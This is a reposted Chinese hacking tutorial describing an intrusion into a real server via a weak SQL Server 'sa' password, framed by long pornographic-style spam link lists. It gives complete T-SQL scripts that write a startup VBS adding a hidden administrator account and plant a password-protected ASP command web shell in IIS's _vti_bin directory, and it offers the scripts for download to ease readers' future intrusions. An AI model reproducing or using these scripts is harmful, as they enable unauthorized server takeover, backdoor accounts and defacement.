亚洲香蕉成人av网站在线观看_欧美精品成人91久久久久久久_久久久久久久久久久亚洲_热久久视久久精品18亚洲精品_国产精自产拍久久久久久_亚洲色图国产精品_91精品国产网站_中文字幕欧美日韩精品_国产精品久久久久久亚洲调教_国产精品久久一区_性夜试看影院91社区_97在线观看视频国产_68精品久久久久久欧美_欧美精品在线观看_国产精品一区二区久久精品_欧美老女人bb

首頁 > 開發 > 綜合 > 正文

對SA權限的再突破 (對付xplog70.dll被刪)轉載

2024-07-21 02:50:46
字體:
來源:轉載
供稿:網友
對SA權限的再突破 (對付xplog70.dll被刪)轉載對SA權限的再突破 (對付xplog70.dll被刪)轉載

轉載自:http://www.bitscn.com/plus/view.php?aid=45439

SQL ERRORLOG的啟動信息

2014-03-06 15:04:40.14 spid51 Attempting to load library 'xplog70.dll' into memory. This is an informational message only. No user action is required.2014-03-06 15:04:40.25 spid51 Using 'xplog70.dll' version '2009.100.1600' to execute extended stored PRocedure 'xp_msver'. This is an informational message only; no user action is required.

黑客X檔案第7期57頁,青野志狼有一篇文章<<對SA的權限突破>>。文章寫到了在知道sql服務器的SA用戶名弱密碼后,而服務器去掉了SA的xp_cmdshell權限的情況下,如何通過SQL命令恢復SA的xp_cmdshell權限來進行入侵。這樣入侵(詳細請看原文)的前提是服務器的xplog70.dll沒有被刪除或改名,這一點青野志狼也談到了,但是他沒有寫在xplog70.dll被刪掉或改名的情況下的入侵方法。這里就把我曾經在這樣情況下一次成功的黑站驗給大家分享一下。

  先來看我對xx.41.153.190的掃描結果。x-scan2.3掃描后的詳細漏洞表如下:

  [開放端口]21/80/1433/3389  [sql弱口令]sa(aaa) [CGI漏洞] /_vti_bin/fpcount.exe?Page=default.htm|Image=2|Digits=1 [漏洞描述] /_vti_bin/shtml.dll/nosuch.htm [漏洞描述] /_vti_bin/shtml.dll [漏洞描述] /_vti_bin/shtml.dll/_vti_rpc [漏洞描述] /_vti_bin/shtml.exe [漏洞描述]   除了這幾個漏洞,x-scan2.3再沒有掃出別的了,好在有sql弱口令。用sql連接器連上看看吧,可大失所望。dir命令不能執行,好像是服務器去掉了SA的xp_cmdshell權限。

我再用sql的查循分析器來連接SQL服務器恢復cmd_shell權限試試。在sql的查循分析器里寫入 sp_addextendedproc xp_cmdshell,@dllname=’xplog70.dll’,但是顯示錯誤。

看樣子是xplog70.dll被改名了。抱著試試看看的態度,再用sql連接器連上,執行dir命令,依然依顯示圖1的情況。

  這種情況下怎么辦呢?既然有了sql弱口令,而且sql的查循分析器也可以連接上,當然也可以用它來寫一些文本程序在服務器上。再打開查循分析器,在彈出的文本框里寫入以下sql腳本命令:

declare @o int, @f int, @t int, @ret int ,@a int exec sp_oacreate ’scripting.filesystemobject’, @o out ---給菜鳥加個簡單注釋,這兩行代碼是建立sql的文本對象 exec sp_oamethod @o, ’createtextfile’, @f out, ’c:/docume~1/alluse~1/「開始」菜單/程序/啟動/a.vbs’, 1 --在啟動菜單里寫入a.vbs,當然這里只支持中文 exec @ret = sp_oamethod @f, ’writeline’, NULL, ’set wshshell=createobject("wscript.shell")’ --單引號里的都是a.vbs的內容,要一行一行的寫,下同。 exec @ret = sp_oamethod @f, ’writeline’, NULL, ’a=wshshell.run ("cmd.exe /c net user lcx 123 /add",0)’ exec @ret = sp_oamethod @f, ’writeline’, NULL, ’b=wshshell.run ("cmd.exe /c net localgroup administrators lcx /add",0)’ --a.vbs內容結束 執行查循后,這樣就會在服務器的啟動程序里寫入一個a.vbs腳本。

只要服務器重啟,就可以加入一個用戶名是lcx,密碼是123的管理員用戶了。做完這一切后我就開始等待服務器重啟了,可是等到花兒也謝了,這個用戶也沒加成功,我用lcx的用戶名和密碼123一直也登陸不了3389端口。不知是服務器沒重啟,還是服務器不是中文系統(因為這個sql腳本只支持中文),還是被管理員發現了,總之就是沒加成功。在這之后,我就陷入了深思。于是回頭看x-scan的漏洞掃描報告,上安全焦點查了一些掃到的漏洞資料,還是一無所獲,掃到的漏洞都沒有太大的利用價值。思考中,突然靈光一閃,_vti_bin是一個虛擬目錄,在IIS上默認的物理路徑是C:/Program Files/Common Files/Microsoft Shared/Web Server Extensions/isapi/,我可以在這里用sql的查循分析器寫入一個asp程序呀。先看看思路對不對,執行http://ip/_vti_bin/,返回403錯誤碼。

證明服務器這個虛擬目錄是存在的。好了,我開始寫sql腳本,一行一行寫得好累呀,做個黑客也不容易呀(本想寫入海陽頂端網木馬xp.net版。可代碼太多了):

declare @o int, @f int, @t int, @ret int ,@a int exec sp_oacreate ’scripting.filesystemobject’, @o out --給菜鳥加個簡單注釋:還是建立sql程序的文本對像 exec sp_oamethod @o, ’createtextfile’, @f out, ’C:/Program Files/Common Files/Microsoft Shared/Web Server Extensions/40/isapi/lcx.asp’, 1 --在這個目錄寫入一個lcx.asp文件,沒有就生成,你可以根據需要改成別的目錄。 exec @ret = sp_oamethod @f, ’writeline’, NULL, ’<% if Request("passWord")=1234 then’ --單引號里都是lcx.asp代碼內容,要一行一行的寫呀,我寫的是一個改裝的cmd.asp,下同。 [Page]

exec @ret = sp_oamethod @f, ’writeline’, NULL, ’session("password")="lcx"’ exec @ret = sp_oamethod @f, ’writeline’, NULL, ’response.redirect Request.ServerVariables("URL")’ exec @ret = sp_oamethod @f, ’writeline’, NULL, ’elseif session("password")="" then %>’ exec @ret = sp_oamethod @f, ’writeline’, NULL, ’<FORM name="user" method="POST"> <INPUT TYPE=password NAME=password> <INPUT TYPE=Submit VALUE="確認提交"> </form>’ exec @ret = sp_oamethod @f, ’writeline’, NULL, ’<%else%>’ exec @ret = sp_oamethod @f, ’writeline’, NULL, ’<HTML>’ exec @ret = sp_oamethod @f, ’writeline’, NULL, ’<FORM action="<%= Request.ServerVariables("URL") %>" method="POST">’ exec @ret = sp_oamethod @f, ’writeline’, NULL, ’<input type=text name=".CMD" size=45 value="<%= szCMD %>">’ exec @ret = sp_oamethod @f, ’writeline’, NULL, ’<input type=submit value="執行" class="input">’ exec @ret = sp_oamethod @f, ’writeline’, NULL, ’</FORM> <pre>’ exec @ret = sp_oamethod @f, ’writeline’, NULL, ’<% Dim oScript,oScriptNet,oFileSys, oFile,szCMD, szTempFile’ exec @ret = sp_oamethod @f, ’writeline’, NULL, ’On Error Resume Next’ exec @ret = sp_oamethod @f, ’writeline’, NULL, ’Set oScript = Server.CreateObject("WSCRIPT.SHELL")’ exec @ret = sp_oamethod @f, ’writeline’, NULL, ’Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")’ exec @ret = sp_oamethod @f, ’writeline’, NULL, ’Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")’ exec @ret = sp_oamethod @f, ’writeline’, NULL, ’szCMD = Request.Form(".CMD")’ exec @ret = sp_oamethod @f, ’writeline’, NULL, ’If (szCMD <> "") Then ’ exec @ret = sp_oamethod @f, ’writeline’, NULL, ’szTempFile = "C:/" & oFileSys.GetTempName( ) ’ exec @ret = sp_oamethod @f, ’writeline’, NULL, ’Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)’ exec @ret = sp_oamethod @f, ’writeline’, NULL, ’Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0) ’ exec @ret = sp_oamethod @f, ’writeline’, NULL, ’ End If ’ exec @ret = sp_oamethod @f, ’writeline’, NULL, ’If (IsObject(oFile)) Then’ exec @ret = sp_oamethod @f, ’writeline’, NULL, ’On Error Resume Next’ exec @ret = sp_oamethod @f, ’writeline’, NULL, ’Response.Write Server.HTMLEncode(oFile.ReadAll) ’ exec @ret = sp_oamethod @f, ’writeline’, NULL, ’ oFile.Close ’ exec @ret = sp_oamethod @f, ’writeline’, NULL, ’ Call oFileSys.DeleteFile(szTempFile, True)’ exec @ret = sp_oamethod @f, ’writeline’, NULL, ’End If %> ’ exec @ret = sp_oamethod @f, ’writeline’, NULL, ’</BODY> </HTML> ’ exec @ret = sp_oamethod @f, ’writeline’, NULL, ’<%end if %> ’ --好累,代碼終于寫完了

然后我將這段腳本放在查循分析器里執行,運氣不錯,服務器的iis是默認安裝的,顯示命令成功完成。

迫不及待的來看看運行結果吧,

哈,成功了。忘記告訴你,剛才運行的這段sql腳本,會在C:/Program Files/Common Files/Microsoft Shared/Web Server Extensions/isapi/這個物理目錄下,也就是虛擬目錄_vti_bin目錄下生成lcx.asp這個asp文件,是一個改裝的cmd.asp了,密碼是1234。輸入密碼1234后,再來看看,得到一個cmd的網頁shell了。

雖然權限不是很大,但是查看服務器敏感信息,黑掉服務器的網頁是綽綽有余的。我就用這個lcx.asp在服務器的C:/Program Files/Microsoft SQL Server/MSSQL/Binn這個目錄里發現了一個可疑的xplog701.dll文件,和原來的文件大小比較,果然是一個改名的xplog70.dll。也許有的人要說,你可以再將名字改回來呀。我也試過,雖然改過名,也需要重啟mssql服務,這個xplog70.dll才可以加載??礃幼游业倪\氣到了盡頭,在這臺機器上再沒有得到太多滲透入侵結果了。

  后來我在本機做過測試,我是w2k+sp3+iis5.0+fat32系統,在默認安裝情況下,一些默認的虛擬目錄用sql 查循分析器大都是可寫的,而且這些默認的虛擬目錄對應的物理目錄都是固定的。除了上文講到的_vti_bin外,還有像http://ip/printers對應的是C:/WINNT/web/printers,http://ip/對應的是c:/inetpub/wwwroot等等。所以平常說的暴露物理路徑的危害由此實例可以管中窺豹了。

  最后,我將本文中兩個sql腳本和我改裝過的lcx.asp為了大家今后入侵的方便,放在這里供大家下載(同url下的vbs.sql/asp.sql/lcx.asp壓縮包里有),如果你今后也遇到同樣情況,省去你手工輸入的麻煩了,但我可不鼓勵你入侵呀。

參考文章:

服務器安全部署文檔

Windows2003 SQL2005解決系統Administrator密碼不知道的問題


發表評論 共有條評論
用戶名: 密碼:
驗證碼: 匿名發表
亚洲香蕉成人av网站在线观看_欧美精品成人91久久久久久久_久久久久久久久久久亚洲_热久久视久久精品18亚洲精品_国产精自产拍久久久久久_亚洲色图国产精品_91精品国产网站_中文字幕欧美日韩精品_国产精品久久久久久亚洲调教_国产精品久久一区_性夜试看影院91社区_97在线观看视频国产_68精品久久久久久欧美_欧美精品在线观看_国产精品一区二区久久精品_欧美老女人bb
欧美色另类天堂2015| 亚洲xxxx3d| 久久久亚洲精品视频| 国产区精品在线观看| 国产一区二区三区视频| 免费av一区二区| 欧美日韩美女在线| 精品动漫一区二区| 国产精品中文在线| 91免费人成网站在线观看18| 1769国内精品视频在线播放| 日韩小视频在线| 亚洲午夜未满十八勿入免费观看全集| 国产精品免费小视频| 久久久久久久亚洲精品| 97成人超碰免| 国产精品美女久久久久久免费| 国产午夜精品美女视频明星a级| 91av在线看| 国产欧美一区二区三区四区| 久久久久国产精品一区| 成人黄色中文字幕| 美女久久久久久久久久久| 国产精品国产三级国产aⅴ浪潮| 日韩亚洲精品电影| 欧美精品生活片| 这里只有视频精品| 国产日韩精品视频| 97香蕉久久超级碰碰高清版| 两个人的视频www国产精品| 日韩高清av在线| 精品少妇一区二区30p| 91精品国产自产在线观看永久| 欧美日韩亚洲精品一区二区三区| 亚洲一区二区久久久| 亚洲激情视频在线播放| 亚洲午夜久久久久久久| 午夜精品久久久久久久白皮肤| 成人欧美在线视频| 欧美午夜宅男影院在线观看| 欧美黄色性视频| 91高清免费在线观看| 中文字幕日韩高清| 国产日韩欧美电影在线观看| 国产在线98福利播放视频| 在线看福利67194| 日韩免费观看高清| 亚洲精品成人免费| 精品无人区太爽高潮在线播放| 亚洲欧美日韩精品| 在线成人激情黄色| 欧美在线视频一二三| 欧美综合在线第二页| 欧美久久精品午夜青青大伊人| 91国自产精品中文字幕亚洲| 久久香蕉国产线看观看av| 久久久久久久激情视频| 国产视频在线观看一区二区| 久热精品视频在线| 精品久久久香蕉免费精品视频| 青草青草久热精品视频在线观看| 久久九九全国免费精品观看| 欧美激情精品久久久久久大尺度| 国产亚洲a∨片在线观看| 久久久精品免费视频| 一区二区亚洲欧洲国产日韩| 久久福利视频网| 亚洲网站在线观看| 成人中文字幕+乱码+中文字幕| 日韩av在线一区| 亚洲综合中文字幕在线| 久久久精品国产亚洲| 国产综合久久久久久| 国产精品流白浆视频| 欧美巨乳在线观看| 成人av.网址在线网站| 欧美亚洲另类制服自拍| 成人在线一区二区| 亚洲影视中文字幕| 57pao国产精品一区| 国产精品99久久久久久白浆小说| 色婷婷综合久久久久中文字幕1| 亚洲成人a级网| www欧美xxxx| 欧美高清自拍一区| 91色精品视频在线| 久久久亚洲国产天美传媒修理工| 国产精品丝袜高跟| 国产一区二区三区三区在线观看| 日韩视频免费大全中文字幕| 成人在线观看视频网站| 97视频在线观看免费高清完整版在线观看| 国产美女精品免费电影| 久久亚洲精品中文字幕冲田杏梨| 精品亚洲aⅴ在线观看| 国产日本欧美一区二区三区在线| 日韩精品免费观看| 日本精品一区二区三区在线播放视频| 国产一区二区在线免费| 亚洲欧美国产一本综合首页| 亚洲网站视频福利| 久久久久久久影院| 久久91亚洲精品中文字幕奶水| 国产精品99久久久久久久久久久久| 亚洲第一区在线| 久久久久久久久久久国产| 亚洲精品白浆高清久久久久久| 国产精品久在线观看| 影音先锋欧美在线资源| 欧美日韩成人网| 97香蕉久久夜色精品国产| 91系列在线观看| 日本成人精品在线| 日韩欧美成人精品| 色噜噜狠狠狠综合曰曰曰| 欧美性极品xxxx娇小| 国产精品三级久久久久久电影| 欧美成人精品在线| 丝袜美腿亚洲一区二区| 欧美一级免费看| 亚洲一区二区三区视频| 久久99久久99精品中文字幕| 欧美天堂在线观看| 欧美小视频在线观看| 成人97在线观看视频| 91在线视频导航| 国产成人小视频在线观看| 欧美成人免费在线视频| 久久精品影视伊人网| 国产精品久久久久久久9999| 欧美亚洲视频在线观看| 欧美区在线播放| 91九色国产在线| 国产成人一区三区| 久久久久久久久亚洲| 羞羞色国产精品| 美女扒开尿口让男人操亚洲视频网站| 国产精品无码专区在线观看| 国产精品丝袜久久久久久不卡| 久久国产精品久久精品| 久久国产精品久久久| 92福利视频午夜1000合集在线观看| 国产丝袜精品第一页| 国产成人自拍视频在线观看| 欧美最近摘花xxxx摘花| 国产欧美精品xxxx另类| 国产不卡精品视男人的天堂| 日韩麻豆第一页| 亚洲成人精品久久久| 亚洲欧美精品中文字幕在线| 久久久在线视频| 色婷婷综合成人av| 一本色道久久88亚洲综合88| 亚洲精品第一国产综合精品| 久久影院资源站| 日韩中文字幕在线视频| 免费成人高清视频| 亚洲视频国产视频| 国产91精品久久久久久久| 欧美成人激情视频| 欧美做受高潮电影o| 最新日韩中文字幕| 午夜精品视频在线| 久久夜色精品国产|